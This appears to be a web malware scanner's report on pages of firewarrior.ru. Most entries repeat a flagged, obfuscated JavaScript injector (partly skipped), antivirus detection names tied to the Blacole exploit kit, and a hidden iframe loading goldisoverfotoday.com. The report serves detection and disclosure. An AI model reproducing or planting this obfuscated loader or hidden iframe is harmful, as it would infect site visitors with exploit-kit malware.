Request | Server response | Status |
http://www.firewarrior.ru/ | 200 OK Content-Length: 26435 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
|
http://adv.rtelekom.net/adx.js | 200 OK Content-Length: 73 Content-Type: application/javascript | clean |
http://www.firewarrior.ru/history.html | 200 OK Content-Length: 16124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics.html | 200 OK Content-Length: 14185 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics/acl.html | 200 OK Content-Length: 13823 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics/abr.html | 200 OK Content-Length: 15459 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics/433.html | 200 OK Content-Length: 15134 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics/130.html | 200 OK Content-Length: 15136 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/tecnics/131.html | 200 OK Content-Length: 15133 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms.html | 200 OK Content-Length: 16636 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms/bop.html | 200 OK Content-Length: 15256 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms/barrels.html | 200 OK Content-Length: 15469 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
- Avast
- JS:Agent-KE [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Iframe.AHH
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- TROJ_GEN.RCBH1B1
- Emsisoft
- Trojan.JS.Iframe.AHH (B)
- Comodo
- TrojWare.JS.Kryptik.AY
- McAfee-GW-Edition
- JS/Exploit-Blacole.cp
- DrWeb
- JS.Click.233
- Kaspersky
- Trojan-Downloader.JS.Agent.fzo
- Microsoft
- Exploit:JS/Blacole.A
- MicroWorld-eScan
- Trojan.JS.Iframe.AHH
- Fortinet
- JS/Crypt.AAFD!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.cp
- NANO-Antivirus
- Trojan.Script.Iframe.dumti
- F-Secure
- Trojan.JS.Iframe.AHH
- VIPRE
- Trojan.JS.Obfuscator.v (v)
- F-Prot
- JS/Crypted.OB.gen
- AVG
- JS/Agent.L
- Norman
- Agent.WM
- GData
- Trojan.JS.Iframe.AHH
- Commtouch
- JS/Crypted.OB.gen
- BitDefender
- Trojan.JS.Iframe.AHH
Hidden iFrame found. The same iFrame was found in 9 websites. size: 5x4 src: http://goldisoverfotoday.com/r/g.php <iframe src="http://goldisoverfotoday.com/r/g.php" width="5" height="4" align="right"> |
http://www.firewarrior.ru/arms/watr.html | 200 OK Content-Length: 12429 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar="'0hb<prCd;soT.{Ngt]Bky:mwi1aAe}vEf>=cn[ l/\")( u,";ar2="R180c180c100c132c156c176c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c172c56c180c180c180c100c1
... 1453 bytes are skipped ...c100c12c184c68c116c176c0c8c116c100c64c8c68c0c188c0c104c4c0c172c36c180c180c180c32c44c144c184c92c116c148c68c52c64c116c68c128c160c116c92c116c148c68c40c76c84c48c108c64c60c108c92c116c176c0c12c44c32c84c0c172c152c4c72c52c108c20c20c116c148c32c28c8c100c160c32c176c132c172c36c180c180c120";pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="180";s="";for(i=0;i!=ar2.length;i++){e('pos=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);Antivirus reports:- AntiVir
- JS/Redirector.htr
